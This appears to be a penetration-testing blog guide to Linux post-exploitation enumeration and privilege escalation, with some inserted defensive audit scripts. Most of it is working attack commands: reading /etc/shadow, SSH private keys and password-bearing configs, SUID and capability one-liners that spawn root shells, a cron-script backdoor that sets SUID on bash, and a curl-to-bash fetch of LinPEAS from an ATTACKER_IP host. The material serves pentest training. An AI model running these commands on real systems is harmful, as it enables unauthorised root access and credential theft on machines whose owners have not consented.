You’ve landed a shell on a Linux box. Now what? Post-exploitation enumeration is the systematic process of understanding where you are, who you are, what you have access to, and how you can escalate privileges. This guide covers both manual techniques and automated tools to help you build a complete picture of the compromised host.
First 60 Seconds: Situational Awareness
Run these immediately after gaining access:
```bash
# Who am I and what groups do I belong to?
id
whoami
groups
# What OS and kernel version?
uname -a
cat /etc/os-release
cat /proc/version
# What's the hostname and IP info?
hostname
ip addr show
ifconfig 2>/dev/null
# Any other users on the system?
cat /etc/passwd
cat /etc/shadow # Only readable as root — check if accessible
# What's the current directory and home?
pwd
ls -la ~
```
The id command is often the most immediately revealing. Membership in groups like sudo, docker, lxd, disk, or adm can provide straightforward escalation paths without any exploit needed.
User and Credential Enumeration
```bash
# All users with login shells
grep -v nologin /etc/passwd | grep -v false
# Users who have logged in recently
last
lastlog
# Currently logged-in users
who
w
# Sudo privileges for current user (may prompt for password)
sudo -l
# Read SSH keys
ls -la ~/.ssh/
cat ~/.ssh/id_rsa 2>/dev/null
cat ~/.ssh/authorized_keys 2>/dev/null
# Check for credential files (-print0/-0 keeps paths with spaces intact)
find / -name "*.conf" -type f -readable -print0 2>/dev/null | xargs -0 grep -l "password" 2>/dev/null
find / -name "*.env" -readable 2>/dev/null
find / -name "wp-config.php" -readable 2>/dev/null
find / -name "config.php" -readable 2>/dev/null
```
SUID Binaries
SUID (Set User ID) binaries run with the permissions of their owner, not the caller. SUID binaries owned by root that can be abused are one of the most reliable privilege escalation paths.
```bash
find / -perm -4000 2>/dev/null
```
A cleaner output with file type:
```bash
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
```
Compare your output against GTFOBins — a curated list of Unix binaries that can be exploited when they have special permissions. Common finds and their abuse:
| Binary | Exploit Method |
|---|---|
| /usr/bin/find | find . -exec /bin/bash -p \; -quit |
| /usr/bin/vim | :!/bin/bash or :set shell=/bin/bash:shell |
| /usr/bin/python3 | python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")' |
| /usr/bin/nmap | nmap --interactive then !sh (older versions) |
| /usr/bin/cp | Copy /etc/passwd with modified root entry |
| /usr/bin/less | less /etc/passwd then !bash |
SGID binaries (run as the owning group) are also worth checking:
```bash
find / -perm -2000 -type f 2>/dev/null
```
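As an added example (not from the original post), here is the defender's counterpart to the GTFOBins comparison: diff the live SUID/SGID listing against a baseline captured from a known-good image of the same build, then tag each new entry whose basename appears in the table above. Both listings below are constructed; the find command in the comment produces the real ones.

```bash
# Baseline from a known-good host, and the listing from the host under review.
# Both are constructed here; generate real ones with
#   find / -xdev \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null | sort
BASELINE='/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount'

CURRENT_LISTING='/usr/bin/find
/usr/bin/mount
/usr/bin/passwd
/usr/bin/python3
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/local/bin/backup-helper'

# Basenames the GTFOBins table above documents as shell-capable when SUID.
GTFO_SUID_NAMES='find vim python3 nmap cp less'

# suid_new: print each path on stdin that is absent (exact match) from $BASELINE.
suid_new() {
  while IFS= read -r path; do
    printf '%s\n' "$BASELINE" | grep -qxF -- "$path" || printf '%s\n' "$path"
  done
  return 0
}

# suid_triage: tag each new path GTFOBINS if its basename is a known shell-capable
# binary, otherwise UNKNOWN (vendor or custom binaries need a manual review either way;
# on Debian, dpkg -S <path> tells you whether a package installed it at all).
suid_triage() {
  while IFS= read -r path; do
    name=${path##*/}
    tag=UNKNOWN
    case " $GTFO_SUID_NAMES " in *" $name "*) tag=GTFOBINS ;; esac
    printf '%s %s\n' "$tag" "$path"
  done
  return 0
}

printf '%s\n' "$CURRENT_LISTING" | suid_new | suid_triage
```

Anything tagged GTFOBINS that is not in the baseline is a drift to explain or revert; the baseline itself should be regenerated whenever the image is rebuilt.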
Capabilities
Linux capabilities are a more granular privilege system. Some capabilities can be as dangerous as SUID:
```bash
getcap -r / 2>/dev/null
```
Watch for:
- cap_setuid — Can set UID (essentially root)
- cap_net_raw — Can use raw sockets (useful for sniffing)
- cap_dac_override — Can bypass file permission checks
Example: Python with cap_setuid:
```bash
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
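Added example (not part of the original post): a small parser for getcap -r output that handles both line formats libcap has printed over the years (the older "path = cap_x+ep" and the newer "path cap_x=ep") and rates each binary by the capabilities listed above. The sample output is constructed, and the severity lists are an assumption to tune per environment.

```bash
# Constructed getcap -r output mixing the old ("=" / "+ep") and new ("=ep") formats.
GETCAP_SAMPLE='/usr/bin/ping cap_net_raw=ep
/usr/bin/python3 = cap_setuid+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/opt/agent/collector cap_dac_override,cap_chown=eip
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep'

# Severity lists (assumed): HIGH is effectively root (the page's cap_setuid and
# cap_dac_override, plus cap_setgid/cap_sys_admin/cap_sys_ptrace which grant the same);
# MEDIUM is cap_net_raw and friends, normal on ping/tcpdump, suspicious elsewhere.
HIGH_CAPS='cap_setuid cap_setgid cap_dac_override cap_sys_admin cap_sys_ptrace'
MEDIUM_CAPS='cap_net_raw cap_net_admin'

# cap_triage: read getcap lines on stdin, print "SEVERITY path" for binaries that
# carry at least one listed capability. The path is the first whitespace token in
# either format; capability names are pulled out with grep -o so the separator
# (",", "=", "+") and the flag set (e, i, p) do not matter.
cap_triage() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    path=${line%% *}
    sev=
    for c in $(printf '%s\n' "$line" | grep -o 'cap_[a-z_]*' || true); do
      case " $HIGH_CAPS " in *" $c "*) sev=HIGH ;; esac
      case " $MEDIUM_CAPS " in *" $c "*) [ "$sev" = HIGH ] || sev=MEDIUM ;; esac
    done
    if [ -n "$sev" ]; then
      printf '%s %s\n' "$sev" "$path"
    fi
  done
  return 0
}

# On a real host: getcap -r / 2>/dev/null | cap_triage
printf '%s\n' "$GETCAP_SAMPLE" | cap_triage
```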
Cron Jobs
Cron jobs running as root that reference writable scripts or directories are a classic escalation vector:
```bash
# System-wide cron
cat /etc/crontab
cat /etc/cron.d/*
ls -la /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/
# User-specific crons (check other users if you have access)
crontab -l
cat /var/spool/cron/crontabs/* 2>/dev/null
```
If a cron job runs /opt/scripts/backup.sh as root and /opt/scripts/backup.sh is world-writable:
```bash
echo 'chmod +s /bin/bash' >> /opt/scripts/backup.sh
# Wait for cron to execute...
/bin/bash -p
```
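Here is an added example (not from the original post) that performs the defender's side of this check: parse a system crontab, keep the root jobs, and report any script that is world-writable or sits in a world-writable directory (the latter lets anyone replace the file even when its own mode is 755). The crontab entries and scripts are constructed in a temporary directory so the check runs offline; the parser only handles jobs whose command starts with an absolute path.

```bash
WORK=$(mktemp -d)                      # constructed fixture; removed on exit
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/dropdir"
printf '#!/bin/sh\nexit 0\n' | tee "$WORK/backup.sh" "$WORK/safe.sh" \
  "$WORK/dropdir/clean.sh" "$WORK/rotate.sh" >/dev/null
chmod 755 "$WORK" "$WORK/safe.sh" "$WORK/dropdir/clean.sh" "$WORK/rotate.sh"
chmod 777 "$WORK/backup.sh"            # the textbook mistake: root runs a world-writable script
chmod 777 "$WORK/dropdir"              # subtler: script is 755 but anyone can replace it

# Constructed /etc/crontab content (m h dom mon dow user command).
CRONTAB_SAMPLE="SHELL=/bin/sh
# m h dom mon dow user command
*/5 * * * * root $WORK/backup.sh
0 3 * * * root $WORK/safe.sh
30 3 * * * root $WORK/dropdir/clean.sh
0 4 * * * www-data $WORK/rotate.sh"

# cron_script_paths: read crontab text on stdin, print "user command" for jobs whose
# command is an absolute path; comments, blank lines and VAR=value lines are skipped.
# Compound commands (cd / && run-parts ...) are deliberately ignored here.
cron_script_paths() {
  awk '/^[[:space:]]*#/ { next }
       /^[[:space:]]*$/ { next }
       /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
       NF >= 7 && $7 ~ /^\// { print $6, $7 }'
}

# weak_root_cron: report root jobs whose script an unprivileged user could change,
# because the file is world-writable or because its directory is (rename + replace).
# Mode bits are tested with find -perm, so the verdict does not depend on who runs the audit.
weak_root_cron() {
  cron_script_paths | while read -r user path; do
    [ "$user" = root ] || continue
    if [ ! -e "$path" ]; then
      printf 'MISSING %s\n' "$path"    # root will run whatever appears at this path later
    elif [ -n "$(find "$path" -maxdepth 0 -perm -o+w)" ]; then
      printf 'WORLD-WRITABLE %s\n' "$path"
    elif [ -n "$(find "${path%/*}" -maxdepth 0 -perm -o+w)" ]; then
      printf 'WRITABLE-DIR %s\n' "$path"
    fi
  done
  return 0
}

# On a real host: cat /etc/crontab /etc/cron.d/* | weak_root_cron
printf '%s\n' "$CRONTAB_SAMPLE" | weak_root_cron
```

Group-writable scripts owned by a non-root group are the next thing to add (find -perm -g+w plus a check on the owning group), since the same replacement trick works for any member of that group.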
Writable Files and Directories
```bash
# Files writable by the current user (excluding /proc and /sys).
# Note: -writable tests your own access; for the world-writable bit use -perm -o+w.
find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
# Directories writable by the current user
find / -writable -type d -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
# Files owned by current user
find / -user "$(whoami)" -type f -not -path "/proc/*" 2>/dev/null
```
Processes and Services
```bash
# Running processes (all users)
ps aux
# Processes running as root
ps aux | grep root
# Open network connections and listening ports
ss -tulpn
netstat -tulpn 2>/dev/null
# Services (systemd)
systemctl list-units --type=service --state=running
# Interesting environment variables
env
printenv
```
Internal services listening on 127.0.0.1 but not externally accessible are interesting — they may be exploitable once you have local shell access. Use SSH port forwarding to reach them from your attack machine.
Installed Software and Version Info
```bash
# Debian/Ubuntu
dpkg -l | grep -i "interesting_package"
# RPM-based
rpm -qa
# Check for known-vulnerable versions
mysql --version 2>/dev/null
apache2 -v 2>/dev/null
nginx -v 2>/dev/null
python3 --version
sudo --version
```
Cross-reference versions with searchsploit:
```bash
searchsploit sudo 1.8
```
Network Enumeration
```bash
# ARP table (other hosts on the network)
arp -a
cat /proc/net/arp
# Routing table
ip route
route -n
# DNS configuration
cat /etc/resolv.conf
# Hosts file (may reveal internal hostnames)
cat /etc/hosts
```
Automating with LinPEAS
LinPEAS (Linux Privilege Escalation Awesome Script) automates most of the above and highlights findings in color by severity.
Transfer and Run
From your attack machine, serve it:
```bash
python3 -m http.server 8080
```
On the target:
```bash
curl http://ATTACKER_IP:8080/linpeas.sh | bash
# or download first
wget http://ATTACKER_IP:8080/linpeas.sh -O /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh 2>/dev/null | tee /tmp/lp_output.txt
```
Download LinPEAS from the PEASS-ng GitHub repository. The color-coded output uses:
- Red/yellow — 95% privilege escalation probability
- Red — High probability
- Yellow — Worth investigating
- Green/blue — Informational
Alternatives to LinPEAS:
- linux-smart-enumeration (LSE): lse.sh -l 1 gives a clean, categorized output
- LinEnum: An older but reliable shell script alternative
Interesting Files to Check
```bash
# Bash history (often contains credentials or useful commands)
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
# Mail spool
ls /var/mail/
cat /var/mail/root 2>/dev/null
# Log files (for credentials or clues)
grep -i "password\|fail\|success" /var/log/auth.log 2>/dev/null
head -50 /var/log/apache2/access.log 2>/dev/null
# Database files
find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null
```
A Systematic Approach
Don’t enumerate randomly. Follow this priority order:
- sudo -l — Instant escalation if misconfigured
- SUID binaries — Reliable and common
- Cron jobs — Look for writable scripts
- Capabilities — Often overlooked
- Writable sensitive files — /etc/passwd, service configs
- Kernel exploits — Last resort due to system instability risk
Post-exploitation enumeration is where the real work of a pentest happens. The initial foothold matters little if you can’t pivot or escalate. Take notes, save command output, and cross-reference everything against GTFOBins and exploit databases to maximize your findings.